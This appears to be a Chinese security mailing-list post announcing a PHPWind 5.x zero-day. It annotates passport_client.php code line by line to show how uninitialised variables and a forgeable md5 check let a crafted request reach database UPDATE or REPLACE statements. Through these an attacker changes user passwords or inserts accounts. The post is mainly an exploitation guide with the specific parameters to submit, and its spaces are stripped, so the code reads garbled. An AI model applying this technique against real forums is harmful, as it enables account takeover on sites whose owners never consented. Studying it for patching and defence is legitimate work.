Ph4nt0m]Re:Anotherphpwind5.x0day
ph4nt0m@googlegroups.com
今天要luoluo牛抓了下包,这个挺牛的:)
passport_client.php里变量没有初始化可以绕过那些判断:
if(!$passport_ifopen||$passport_type!='client'){
exit("Passportclosed(PHPWind)");
}//提交:passport_ifopen=1&passport_type=client绕过
if(md5($action.$userdb.$forward.$passport_key)!=$verify){
exit('Illegalrequest(PHPWind)');
}//里面的变量都可以自定义,所以你可以sy一下绕过
parse_str(StrCode($userdb,'DECODE'),$userdb);//注意StrCode($userdb,'DECODE'),所以你要把你提交的变量$userdb,StrCode($userdb,'DECODE')编码一下
if($action=='login'){//提交action=login
if(!$userdb['time']||!$userdb['username']||!$userdb['password']){
exit("Lackofparameters(PHPWind)");
}//提交的$userdb解码以后要有这些
if($timestamp-$userdb['time']>3600){
exit('Passportrequestexpired(PHPWind)');
}//提交时间userdb['time']大一点
.....
$rt=$db->get_one("SELECTuid$sqlFROMpw_membersWHEREusername='$userdb[username]'");
if($rt){//如果有这个用户的话调用下面的语句修改密码等
$sql&&$db->update("UPDATEpw_membersSET$sqlWHEREuid='$rt[uid]'");
$sql2&&$db->update("UPDATEpw_memberdataSET$sql2WHEREuid='$rt[uid]'");
}else{//如果没有这个用户就会调用下面的增加一个
$db->update("REPLACEINTOpw_members($sql1,groupid,memberid,gender,regdate,signchange)VALUES($sql2,'-1','8','0','$timestamp','1')");
..............
当前位置:
